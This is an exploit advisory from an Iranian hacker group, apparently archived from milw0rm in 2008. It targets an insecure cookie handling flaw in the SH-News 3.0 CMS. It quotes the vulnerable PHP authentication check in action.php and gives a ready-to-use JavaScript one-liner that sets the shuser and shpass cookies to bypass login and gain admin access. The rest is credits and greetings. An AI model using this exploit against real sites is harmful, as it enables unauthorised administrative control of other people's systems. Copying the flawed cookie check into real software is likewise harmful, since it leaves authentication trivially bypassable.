######################################################################## # # # ...:::::SH-News 3.0 Insecure Cookie Handling Vulnerability ::::.... # ######################################################################## Virangar Security Team www.virangar.net www.virangar.ir -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) ------- vuln code in action.php: line 66: $shuser = $HTTP_COOKIE_VARS[shuser]; line 67: $shpass = $HTTP_COOKIE_VARS[shpass]; ... line 69: if((!$shuser) || (!$shpass)) { header("Location: login.php"); } --- exploit: javascript:document.cookie = "shuser=1; path=/"; document.cookie = "shpass=1; path=/"; ----- now you can access to action.php whit admin access and manage the cms ;) ------- young iranian h4ck3rz # milw0rm.com [2008-06-15]